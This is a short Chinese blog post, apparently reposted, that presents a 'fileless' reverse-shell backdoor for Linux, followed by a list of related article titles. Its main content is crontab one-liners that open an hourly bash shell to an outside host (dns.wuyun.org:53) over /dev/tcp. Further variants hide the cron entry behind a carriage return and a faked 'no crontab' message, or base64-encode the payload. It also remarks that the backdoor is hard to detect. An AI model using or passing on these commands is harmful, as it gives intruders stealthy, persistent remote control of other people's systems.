无文件兼容性强的反弹后门
来源:互联网 发布:linux vi之后怎么编辑 编辑:程序博客网 时间:2024/04/29 05:53
最好用一个不常见的用户执行,任务写入/var/spool/cron/$username (crontab -l;echo '*/60 * * * * exec 9<> /dev/tcp/dns.wuyun.org/53;exec 0<&9;exec 1>&9 2>&1;/bin/bash --noprofile -i')|crontab -升级猥琐版,crontab -l 直接提示no crontab for $username (crontab -l;printf "*/60 * * * * exec 9<> /dev/tcp/dns.wuyun.org/53;exec 0<&9;exec 1>&9 2>&1;/bin/bash --noprofile -i;\rno crontab for `whoami`%100c\n")|crontab -60分钟反连一次,在未连接状态启动反连任务的时候,进程和端口都无状态 -bash: connect: Connection refused -bash: /dev/tcp/dns.wuyun.org/53: Connection refused -bash: 9: Bad file descriptor -bash: 9: Bad file descriptor也就是说,你安装后,如果不连接成功,是很难被发现的。
#变异版本[root@localhost ~]# (crontab -l;echo '*/1 * * * * a=`echo "ZXhlYyA5PD4gL2Rldi90Y3AvbG9jYWxob3N0LzgwODA7ZXhlYyAwPCY5O2V4ZWMgMT4mOSAyPiYxOy9iaW4vYmFzaCAtLW5vcHJvZmlsZSAtaQ=="|base64 -d`;/bin/bash -c "$a";unset a')|crontab -
0 0
- 无文件兼容性强的反弹后门
- 五个反弹后门的源代码
- 五个反弹后门的源代码
- 五个反弹后门的源代码
- 五个反弹后门的源代码
- PHP 无文件后门
- 五个反弹后门的源代码[转]
- vc++实现无进程无DLL无硬盘文件无启动项的ICMP后门后门程序
- vc++实现无进程无DLL无硬盘文件无启动项的ICMP后门后门程序
- vc++实现无进程无DLL无硬盘文件无启动项的ICMP后门后门程序
- 反弹式后门代码
- 查看完整版本: weibo反弹后门的源代码
- 最简单的反弹后门设计和基本模块代码
- Byshell后门:无进程无DLL无硬盘文件
- 在IPhone/IPad上建立反弹后门
- windows的iis做后门隐藏访问无日志
- 文件操作之木马后门的配置
- 来段后门,反弹的,高手略过哈(转自http://forum.darkst.com/read.php?tid=9537)
- linux awk命令:好用的数据处理工具
- Hadoop1.0的分布式安装和安全模式
- 缓存入门教程
- URL中“#” “?” &“”号的作用
- 测试-好博
- 无文件兼容性强的反弹后门
- RCP:利用actionSet在菜单(menu)里添加内容
- php 文件夹操作
- 关于对hibernate使用以及简答CRUD操作方法的记录
- 剑指offer 面试题12—打印1到最大的n位数
- dw 选项卡
- /bin/sh^M:bad interpreter: No such file or directory
- 二维码扫描之zxing与zbar的优劣
- equals和==的区别
